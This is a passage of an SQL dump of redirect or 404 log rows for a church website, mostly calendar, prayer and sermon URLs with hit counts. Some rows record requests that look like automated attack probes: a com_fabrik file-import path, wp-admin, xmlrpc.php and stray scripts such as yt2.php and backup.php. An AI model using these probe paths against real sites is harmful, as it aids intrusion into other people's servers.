(1228, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1918/11/-', NULL, '', '', 1, 0, '2017-01-09 16:24:39', '0000-00-00 00:00:00', 301),
(1229, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1919/12/-', NULL, '', '', 1, 0, '2017-01-09 16:24:47', '0000-00-00 00:00:00', 301),
(1230, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2027/6/22/-', NULL, '', '', 1, 0, '2017-01-09 16:24:55', '0000-00-00 00:00:00', 301),
(1231, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/3/2/-', NULL, '', '', 1, 0, '2017-01-09 16:25:03', '0000-00-00 00:00:00', 301),
(1232, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1920/12/-', NULL, '', '', 1, 0, '2017-01-09 16:25:19', '0000-00-00 00:00:00', 301),
(1233, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1917/11/-', NULL, '', '', 1, 0, '2017-01-09 16:25:26', '0000-00-00 00:00:00', 301),
(1234, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1918/12/-', NULL, '', '', 1, 0, '2017-01-09 16:25:34', '0000-00-00 00:00:00', 301),
(1235, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1917/12/-', NULL, '', '', 1, 0, '2017-01-09 16:25:42', '0000-00-00 00:00:00', 301),
(1236, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1918/1/-', NULL, '', '', 1, 0, '2017-01-09 16:25:50', '0000-00-00 00:00:00', 301),
(1237, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/31/-', NULL, '', '', 1, 0, '2017-01-09 16:25:58', '0000-00-00 00:00:00', 301),
(1238, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1917/1/-', NULL, '', '', 1, 0, '2017-01-09 16:26:06', '0000-00-00 00:00:00', 301),
(1239, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/7/24/-', NULL, '', '', 1, 0, '2017-01-09 16:26:37', '0000-00-00 00:00:00', 301),
(1240, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1917/2/-', NULL, '', '', 1, 0, '2017-01-09 16:26:45', '0000-00-00 00:00:00', 301),
(1241, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/28/-', NULL, '', '', 1, 0, '2017-01-09 16:26:53', '0000-00-00 00:00:00', 301),
(1242, 'http://www.lifeoasisinternationalchurch.org/index.php/104-prayerfocus31', NULL, '', '', 4, 0, '2017-01-09 18:06:23', '0000-00-00 00:00:00', 301),
(1243, 'http://www.lifeoasisinternationalchurch.org/14-prayer-a-fasting-day-5', NULL, '', '', 2, 0, '2017-01-09 18:22:04', '0000-00-00 00:00:00', 301),
(1244, 'http://www.lifeoasisinternationalchurch.org/ministries/ljmti/18-loic/50-young-achievers', NULL, '', '', 6, 0, '2017-01-09 18:53:05', '0000-00-00 00:00:00', 301),
(1245, 'http://www.lifeoasisinternationalchurch.org/index.php/160-day-32', NULL, '', '', 9, 0, '2017-01-09 19:16:27', '0000-00-00 00:00:00', 301),
(1246, 'http://www.lifeoasisinternationalchurch.org/index.php/194-2015-day-18', NULL, '', '', 6, 0, '2017-01-09 19:20:02', '0000-00-00 00:00:00', 301),
(1247, 'http://lifeoasisinternationalchurch.org/contact.html', NULL, '', '', 3, 0, '2017-01-09 20:02:35', '0000-00-00 00:00:00', 301),
(1248, 'http://lifeoasisinternationalchurch.org/gobc2015', NULL, '', '', 37, 0, '2017-01-09 21:30:41', '0000-00-00 00:00:00', 301),
(1249, 'http://ljmti.lifeoasisinternationalchurch.org/portfolio/video-portfolio', NULL, '', '', 1, 0, '2017-01-09 21:39:09', '0000-00-00 00:00:00', 301),
(1250, 'http://www.lifeoasisinternationalchurch.org/wp-admin', NULL, '', '', 2, 0, '2017-01-09 21:40:09', '0000-00-00 00:00:00', 301),
(1251, 'http://www.lifeoasisinternationalchurch.org/resources/', NULL, '', '', 6, 0, '2017-01-09 21:46:50', '0000-00-00 00:00:00', 301),
(1252, 'http://lifeoasisinternationalchurch.org/11-demo-articles/53-testing', NULL, '', '', 3, 0, '2017-01-09 22:47:14', '0000-00-00 00:00:00', 301),
(1253, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1916/1/-', NULL, '', '', 1, 0, '2017-01-09 23:08:07', '0000-00-00 00:00:00', 301),
(1254, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2027/6/28/-', NULL, '', '', 1, 0, '2017-01-09 23:08:18', '0000-00-00 00:00:00', 301),
(1255, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/3/29/-', NULL, '', '', 1, 0, '2017-01-09 23:08:30', '0000-00-00 00:00:00', 301),
(1256, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1917/3/-', NULL, '', '', 1, 0, '2017-01-09 23:08:54', '0000-00-00 00:00:00', 301),
(1257, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/5/17/-', NULL, '', '', 1, 0, '2017-01-09 23:09:05', '0000-00-00 00:00:00', 301),
(1258, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1915/12/-', NULL, '', '', 1, 0, '2017-01-09 23:09:28', '0000-00-00 00:00:00', 301),
(1259, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1915/11/-', NULL, '', '', 1, 0, '2017-01-09 23:09:40', '0000-00-00 00:00:00', 301),
(1260, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/14/-', NULL, '', '', 1, 0, '2017-01-09 23:10:26', '0000-00-00 00:00:00', 301),
(1261, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1914/12/-', NULL, '', '', 1, 0, '2017-01-09 23:10:49', '0000-00-00 00:00:00', 301),
(1262, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/4/-', NULL, '', '', 1, 0, '2017-01-09 23:11:01', '0000-00-00 00:00:00', 301),
(1263, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/7/13/-', NULL, '', '', 1, 0, '2017-01-09 23:11:13', '0000-00-00 00:00:00', 301),
(1264, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1914/2/-', NULL, '', '', 1, 0, '2017-01-09 23:11:59', '0000-00-00 00:00:00', 301),
(1265, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/27/-', NULL, '', '', 1, 0, '2017-01-09 23:12:11', '0000-00-00 00:00:00', 301),
(1266, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1913/12/-', NULL, '', '', 1, 0, '2017-01-09 23:22:41', '0000-00-00 00:00:00', 301),
(1267, 'http://lifeoasisinternationalchurch.org/ministries/ljmti/10-about-us', NULL, '', '', 1, 0, '2017-01-09 23:38:44', '0000-00-00 00:00:00', 301),
(1268, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1915/10/-', NULL, '', '', 1, 0, '2017-01-09 23:52:56', '0000-00-00 00:00:00', 301),
(1269, 'http://www.lifeoasisinternationalchurch.org/44-prayer-a-fasting-day-35', NULL, '', '', 1, 0, '2017-01-10 00:02:11', '0000-00-00 00:00:00', 301),
(1270, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1915/9/-', NULL, '', '', 1, 0, '2017-01-10 00:38:21', '0000-00-00 00:00:00', 301),
(1271, 'http://www.lifeoasisinternationalchurch.org/index.php/partnership/18-loic/50-young-achievers', NULL, '', '', 3, 0, '2017-01-10 00:43:43', '0000-00-00 00:00:00', 301),
(1272, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/26/-', NULL, '', '', 1, 0, '2017-01-10 00:53:28', '0000-00-00 00:00:00', 301),
(1273, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/10/22/-', NULL, '', '', 1, 0, '2017-01-10 01:12:23', '0000-00-00 00:00:00', 301),
(1274, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/9/-', NULL, '', '', 1, 0, '2017-01-10 01:38:53', '0000-00-00 00:00:00', 301),
(1275, 'http://www.lifeoasisinternationalchurch.org/62-day-10', NULL, '', '', 4, 0, '2017-01-10 01:53:51', '0000-00-00 00:00:00', 301),
(1276, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/5/-', NULL, '', '', 1, 0, '2017-01-10 01:57:47', '0000-00-00 00:00:00', 301),
(1277, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/10/10/-', NULL, '', '', 1, 0, '2017-01-10 02:09:08', '0000-00-00 00:00:00', 301),
(1278, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1915/4/-', NULL, '', '', 1, 0, '2017-01-10 02:12:55', '0000-00-00 00:00:00', 301),
(1279, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1914/3/-', NULL, '', '', 1, 0, '2017-01-10 02:16:42', '0000-00-00 00:00:00', 301),
(1280, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/44-prayer-a-fasting-day-33', NULL, '', '', 16, 0, '2017-01-10 02:16:59', '0000-00-00 00:00:00', 301),
(1281, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1913/2/-', NULL, '', '', 1, 0, '2017-01-10 02:20:29', '0000-00-00 00:00:00', 301),
(1282, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/44-prayer-a-fasting-day-35', NULL, '', '', 5, 0, '2017-01-10 03:27:45', '0000-00-00 00:00:00', 301),
(1283, 'http://lifeoasisinternationalchurch.org/prayer/7-kindom-builder/44-prayer-a-fasting-day-35', NULL, '', '', 2, 0, '2017-01-10 03:53:02', '0000-00-00 00:00:00', 301),
(1284, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/20-army-of-the-lord-3', NULL, '', '', 2, 0, '2017-01-10 04:01:48', '0000-00-00 00:00:00', 301),
(1285, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/16-entering-into-winning-position-4', NULL, '', '', 6, 0, '2017-01-10 04:06:36', '0000-00-00 00:00:00', 301),
(1286, 'http://www.lifeoasisinternationalchurch.org/media/jmails.php?u', NULL, '', '', 2, 0, '2017-01-10 04:15:32', '0000-00-00 00:00:00', 301),
(1287, 'http://www.lifeoasisinternationalchurch.org/index.php/224-2016-day-7', NULL, '', '', 5, 0, '2017-01-10 04:45:38', '0000-00-00 00:00:00', 301),
(1288, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1913/1/-', NULL, '', '', 1, 0, '2017-01-10 04:53:16', '0000-00-00 00:00:00', 301),
(1289, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/19/-', NULL, '', '', 1, 0, '2017-01-10 04:53:23', '0000-00-00 00:00:00', 301),
(1290, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1915/8/-', NULL, '', '', 1, 0, '2017-01-10 04:53:31', '0000-00-00 00:00:00', 301),
(1291, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/11/-', NULL, '', '', 1, 0, '2017-01-10 04:53:39', '0000-00-00 00:00:00', 301),
(1292, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1912/11/-', NULL, '', '', 1, 0, '2017-01-10 04:53:46', '0000-00-00 00:00:00', 301),
(1293, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1913/10/-', NULL, '', '', 1, 0, '2017-01-10 04:54:01', '0000-00-00 00:00:00', 301),
(1294, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1913/4/-', NULL, '', '', 1, 0, '2017-01-10 04:54:09', '0000-00-00 00:00:00', 301),
(1295, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1912/1/-', NULL, '', '', 1, 0, '2017-01-10 04:54:32', '0000-00-00 00:00:00', 301),
(1296, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1915/7/-', NULL, '', '', 1, 0, '2017-01-10 04:54:39', '0000-00-00 00:00:00', 301),
(1297, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/10/12/-', NULL, '', '', 1, 0, '2017-01-10 04:54:47', '0000-00-00 00:00:00', 301),
(1298, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/5/4/-', NULL, '', '', 1, 0, '2017-01-10 04:54:54', '0000-00-00 00:00:00', 301),
(1299, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1916/8/-', NULL, '', '', 1, 0, '2017-01-10 04:55:02', '0000-00-00 00:00:00', 301),
(1300, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1912/3/-', NULL, '', '', 1, 0, '2017-01-10 04:55:10', '0000-00-00 00:00:00', 301),
(1301, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/22/-', NULL, '', '', 1, 0, '2017-01-10 04:55:17', '0000-00-00 00:00:00', 301),
(1302, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1914/5/-', NULL, '', '', 1, 0, '2017-01-10 04:55:32', '0000-00-00 00:00:00', 301),
(1303, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/7/30/-', NULL, '', '', 1, 0, '2017-01-10 04:55:47', '0000-00-00 00:00:00', 301),
(1304, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/24/-', NULL, '', '', 1, 0, '2017-01-10 04:56:03', '0000-00-00 00:00:00', 301),
(1305, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/24/-', NULL, '', '', 1, 0, '2017-01-10 04:56:10', '0000-00-00 00:00:00', 301),
(1306, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1912/9/-', NULL, '', '', 1, 0, '2017-01-10 04:56:25', '0000-00-00 00:00:00', 301),
(1307, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/8/-', NULL, '', '', 1, 0, '2017-01-10 04:56:33', '0000-00-00 00:00:00', 301),
(1308, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/13/-', NULL, '', '', 1, 0, '2017-01-10 04:56:41', '0000-00-00 00:00:00', 301),
(1309, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/27/-', NULL, '', '', 1, 0, '2017-01-10 04:56:48', '0000-00-00 00:00:00', 301),
(1310, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1913/8/-', NULL, '', '', 1, 0, '2017-01-10 04:56:55', '0000-00-00 00:00:00', 301),
(1311, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1917/8/-', NULL, '', '', 1, 0, '2017-01-10 04:57:04', '0000-00-00 00:00:00', 301),
(1312, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/17/-', NULL, '', '', 1, 0, '2017-01-10 04:57:11', '0000-00-00 00:00:00', 301),
(1313, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/18/-', NULL, '', '', 1, 0, '2017-01-10 04:57:19', '0000-00-00 00:00:00', 301),
(1314, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/20', NULL, '', '', 3, 0, '2017-01-10 05:16:42', '0000-00-00 00:00:00', 301),
(1315, 'http://www.lifeoasisinternationalchurch.org/17-fp-headlines-lists/55-kb-zp', NULL, '', '', 7, 0, '2017-01-10 06:00:25', '0000-00-00 00:00:00', 301),
(1316, 'http://www.lifeoasisinternationalchurch.org/index.php/276-day-16-of-21-days-fasting-and-prayer-november', NULL, '', '', 9, 0, '2017-01-10 06:03:42', '0000-00-00 00:00:00', 301),
(1317, 'http://www.lifeoasisinternationalchurch.org/index.php/228-2016-day-11', NULL, '', '', 8, 0, '2017-01-10 06:03:50', '0000-00-00 00:00:00', 301),
(1318, 'http://www.lifeoasisinternationalchurch.org/prayer/62-day-10', NULL, '', '', 11, 0, '2017-01-10 06:55:53', '0000-00-00 00:00:00', 301),
(1319, 'http://www.lifeoasisinternationalchurch.org/index.php/273-day-13-of-21-days-fasting-and-prayer-november', NULL, '', '', 11, 0, '2017-01-10 07:02:17', '0000-00-00 00:00:00', 301),
(1320, 'http://www.lifeoasisinternationalchurch.org/index.php/268-day-8-of-21-days-fasting-and-prayer-november', NULL, '', '', 11, 0, '2017-01-10 07:02:38', '0000-00-00 00:00:00', 301),
(1321, 'http://www.lifeoasisinternationalchurch.org/index.php/59-2014-1', NULL, '', '', 14, 0, '2017-01-10 07:03:43', '0000-00-00 00:00:00', 301),
(1322, 'http://www.lifeoasisinternationalchurch.org/index.php/232-2016-day-15', NULL, '', '', 8, 0, '2017-01-10 07:04:47', '0000-00-00 00:00:00', 301),
(1323, 'http://www.lifeoasisinternationalchurch.org/index.php/281-day-21-of-21-days-fasting-and-prayer-november', NULL, '', '', 16, 0, '2017-01-10 07:15:34', '0000-00-00 00:00:00', 301),
(1324, 'http://lifeoasisinternationalchurch.org/template-info/wimmp', NULL, '', '', 46, 0, '2017-01-10 07:34:32', '0000-00-00 00:00:00', 301),
(1325, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&layout=tag&tag=Themeforest&task=tag&Itemid=624', NULL, '', '', 1, 0, '2017-01-10 09:09:14', '0000-00-00 00:00:00', 301),
(1326, 'http://www.lifeoasisinternationalchurch.org/xmlrpc.php?rsd', NULL, '', '', 12, 0, '2017-01-10 09:30:59', '0000-00-00 00:00:00', 301),
(1327, 'http://www.lifeoasisinternationalchurch.org/wordpress/', NULL, '', '', 49, 0, '2017-01-10 09:31:02', '0000-00-00 00:00:00', 301),
(1328, 'http://www.lifeoasisinternationalchurch.org/59-prophetic-words-for-day-7', NULL, '', '', 9, 0, '2017-01-10 09:32:40', '0000-00-00 00:00:00', 301),
(1329, 'http://www.lifeoasisinternationalchurch.org/index.php/179-2015-day-3', NULL, '', '', 6, 0, '2017-01-10 09:53:36', '0000-00-00 00:00:00', 301),
(1330, 'http://www.lifeoasisinternationalchurch.org/branches in map', NULL, '', '', 1, 0, '2017-01-10 10:30:10', '0000-00-00 00:00:00', 301),
(1331, 'http://lifeoasisinternationalchurch.org/2012-11-09-09-57-10/father-s-heart/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-01-10 10:53:22', '0000-00-00 00:00:00', 301),
(1332, 'http://lifeoasisinternationalchurch.org/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1', NULL, 'http://www.google.com/', '', 2, 0, '2017-01-10 10:58:23', '0000-00-00 00:00:00', 301),
(1333, 'http://lifeoasisinternationalchurch.org/', NULL, 'lifeoasisinternationalchurch.org', '', 19, 0, '2017-01-10 11:20:01', '0000-00-00 00:00:00', 301),
(1334, 'http://lifeoasisinternationalchurch.org/common.php', NULL, 'lifeoasisinternationalchurch.org', '', 3, 0, '2017-01-10 11:26:16', '0000-00-00 00:00:00', 301),
(1335, 'http://lifeoasisinternationalchurch.org/backup.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-01-10 11:42:44', '0000-00-00 00:00:00', 301),
(1336, 'http://lifeoasisinternationalchurch.org/7-kindom-builder/33-prayer-a-fasting-day-24', NULL, '', '', 3, 0, '2017-01-10 13:11:07', '0000-00-00 00:00:00', 301),
(1337, 'http://lifeoasisinternationalchurch.org/2011-08-10-21-22-58/2-uncategorised', NULL, '', '', 10, 0, '2017-01-10 13:11:08', '0000-00-00 00:00:00', 301),
(1338, 'http://lifeoasisinternationalchurch.org/7-kindom-builder/49-prophetic-words-for-day-39', NULL, '', '', 2, 0, '2017-01-10 13:11:09', '0000-00-00 00:00:00', 301),
(1339, 'http://lifeoasisinternationalchurch.org/contact-us/church-locations/16-divine-instructions/37-declaration3', NULL, '', '', 11, 0, '2017-01-10 13:11:12', '0000-00-00 00:00:00', 301),
(1340, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1913/5/-', NULL, '', '', 1, 0, '2017-01-10 13:58:17', '0000-00-00 00:00:00', 301),
(1341, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/5/-', NULL, '', '', 1, 0, '2017-01-10 13:58:41', '0000-00-00 00:00:00', 301),
(1342, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1911/10/-', NULL, '', '', 1, 0, '2017-01-10 13:59:05', '0000-00-00 00:00:00', 301),
(1343, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/29/-', NULL, '', '', 1, 0, '2017-01-10 13:59:17', '0000-00-00 00:00:00', 301),
(1344, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1910/11/-', NULL, '', '', 1, 0, '2017-01-10 13:59:40', '0000-00-00 00:00:00', 301),
(1345, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/13/-', NULL, '', '', 1, 0, '2017-01-10 14:00:02', '0000-00-00 00:00:00', 301),
(1346, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1910/1/-', NULL, '', '', 1, 0, '2017-01-10 14:00:26', '0000-00-00 00:00:00', 301),
(1347, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1913/7/-', NULL, '', '', 1, 0, '2017-01-10 14:00:38', '0000-00-00 00:00:00', 301),
(1348, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/24/-', NULL, '', '', 1, 0, '2017-01-10 14:00:49', '0000-00-00 00:00:00', 301),
(1349, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/10/25/-', NULL, '', '', 1, 0, '2017-01-10 14:01:01', '0000-00-00 00:00:00', 301),
(1350, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1911/2/-', NULL, '', '', 1, 0, '2017-01-10 14:01:13', '0000-00-00 00:00:00', 301),
(1351, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1914/6/-', NULL, '', '', 1, 0, '2017-01-10 14:01:24', '0000-00-00 00:00:00', 301),
(1352, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/20/-', NULL, '', '', 1, 0, '2017-01-10 14:01:48', '0000-00-00 00:00:00', 301),
(1353, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/25/-', NULL, '', '', 1, 0, '2017-01-10 14:02:00', '0000-00-00 00:00:00', 301),
(1354, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1912/5/-', NULL, '', '', 1, 0, '2017-01-10 14:02:12', '0000-00-00 00:00:00', 301),
(1355, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1910/12/-', NULL, '', '', 1, 0, '2017-01-10 14:12:55', '0000-00-00 00:00:00', 301),
(1356, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1917/6/-', NULL, '', '', 1, 0, '2017-01-10 14:24:17', '0000-00-00 00:00:00', 301),
(1357, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/11/30/-', NULL, '', '', 1, 0, '2017-01-10 14:31:50', '0000-00-00 00:00:00', 301),
(1358, 'http://www.lifeoasisinternationalchurch.org/index.php/201-2015-day-26', NULL, '', '', 8, 0, '2017-01-10 14:35:08', '0000-00-00 00:00:00', 301),
(1359, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1911/5/-', NULL, '', '', 1, 0, '2017-01-10 14:35:50', '0000-00-00 00:00:00', 301),
(1360, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-item/itemlist/tag/envato', NULL, '', '', 2, 0, '2017-01-10 14:37:05', '0000-00-00 00:00:00', 301),
(1361, 'http://www.lifeoasisinternationalchurch.org/ministries/wimmp/18-loic/50-young-achievers', NULL, '', '', 6, 0, '2017-01-10 14:39:14', '0000-00-00 00:00:00', 301),
(1362, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1908/11/-', NULL, '', '', 1, 0, '2017-01-10 14:39:22', '0000-00-00 00:00:00', 301),
(1363, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/1/-', NULL, '', '', 1, 0, '2017-01-10 14:46:58', '0000-00-00 00:00:00', 301),
(1364, 'http://lifeoasisinternationalchurch.org/mp3-messages/speaker/2?start=20', NULL, '', '', 1, 0, '2017-01-10 14:58:52', '0000-00-00 00:00:00', 301),
(1365, 'http://lifeoasisinternationalchurch.org/books/02.html', NULL, '', '', 2, 0, '2017-01-10 14:58:53', '0000-00-00 00:00:00', 301),
(1366, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/7/-', NULL, '', '', 1, 0, '2017-01-10 15:02:06', '0000-00-00 00:00:00', 301),
(1367, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/22/-', NULL, '', '', 1, 0, '2017-01-10 15:05:51', '0000-00-00 00:00:00', 301),
(1368, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/16/-', NULL, '', '', 1, 0, '2017-01-10 15:09:38', '0000-00-00 00:00:00', 301),
(1369, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-media', NULL, '', '', 1, 0, '2017-01-10 15:27:49', '0000-00-00 00:00:00', 301),
(1370, 'http://lifeoasisinternationalchurch.org/testimonies/day.listevents/2012/08/13/15', NULL, '', '', 3, 0, '2017-01-10 15:34:38', '0000-00-00 00:00:00', 301),
(1371, 'http://lifeoasisinternationalchurch.org/2011-08-10-21-22-58/12-resources', NULL, '', '', 11, 0, '2017-01-10 15:34:40', '0000-00-00 00:00:00', 301),
(1372, 'http://lifeoasisinternationalchurch.org/2011-08-10-21-22-58/14-contact-us', NULL, '', '', 10, 0, '2017-01-10 15:34:41', '0000-00-00 00:00:00', 301),
(1373, 'http://lifeoasisinternationalchurch.org/7-kindom-builder/30-prophetic-words-for-day-21', NULL, '', '', 2, 0, '2017-01-10 15:36:33', '0000-00-00 00:00:00', 301),
(1374, 'http://lifeoasisinternationalchurch.org//yt2.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-01-10 15:48:30', '0000-00-00 00:00:00', 301),
(1375, 'http://lifeoasisinternationalchurch.org//ytt.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-01-10 15:50:30', '0000-00-00 00:00:00', 301),
(1376, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/60724', NULL, '', '', 1, 0, '2017-01-10 16:03:38', '0000-00-00 00:00:00', 301),
(1377, 'http://lifeoasisinternationalchurch.org/testimonies/month.calendar/2012/09/12/15', NULL, '', '', 2, 0, '2017-01-10 16:14:43', '0000-00-00 00:00:00', 301),
(1378, 'http://lifeoasisinternationalchurch.org/testimonies/month.calendar/2012/08/10/15', NULL, '', '', 3, 0, '2017-01-10 16:14:43', '0000-00-00 00:00:00', 301),
(1379, 'http://www.lifeoasisinternationalchurch.org/template-info/music-2', NULL, '', '', 4, 0, '2017-01-10 16:27:42', '0000-00-00 00:00:00', 301),
(1380, 'http://ljmti.lifeoasisinternationalchurch.org/portfolio/', NULL, '', '', 1, 0, '2017-01-10 16:34:49', '0000-00-00 00:00:00', 301),
(1381, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermons/0/0', NULL, '', '', 57, 0, '2017-01-10 17:18:26', '0000-00-00 00:00:00', 301),
(1382, 'http://lifeoasisinternationalchurch.org/index.php/template-info-2/rev-oyenike-areogun/18-loic/50-young-achievers', NULL, '', '', 23, 0, '2017-01-10 17:24:04', '0000-00-00 00:00:00', 301),
(1383, 'http://lifeoasisinternationalchurch.org/testimonies/week.listevents/2012/08/14/15', NULL, '', '', 4, 0, '2017-01-10 17:24:06', '0000-00-00 00:00:00', 301),
(1384, 'http://lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/20-welcome', NULL, '', '', 3, 0, '2017-01-10 17:24:07', '0000-00-00 00:00:00', 301),
(1385, 'http://lifeoasisinternationalchurch.org/branches/18-loic/50-young-achievers', NULL, '', '', 12, 0, '2017-01-10 17:24:08', '0000-00-00 00:00:00', 301),
(1386, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages', NULL, '', '', 14, 0, '2017-01-10 17:24:10', '0000-00-00 00:00:00', 301),
(1387, 'http://lifeoasisinternationalchurch.org/resources/stream', NULL, '', '', 61, 0, '2017-01-10 19:26:26', '0000-00-00 00:00:00', 301),
(1388, 'http://www.lifeoasisinternationalchurch.org/index.php/222-2016-day-5', NULL, '', '', 6, 0, '2017-01-10 20:41:56', '0000-00-00 00:00:00', 301),
(1389, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/21/-', NULL, '', '', 1, 0, '2017-01-10 21:03:23', '0000-00-00 00:00:00', 301),
(1390, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1909/2/-', NULL, '', '', 1, 0, '2017-01-10 21:03:32', '0000-00-00 00:00:00', 301),
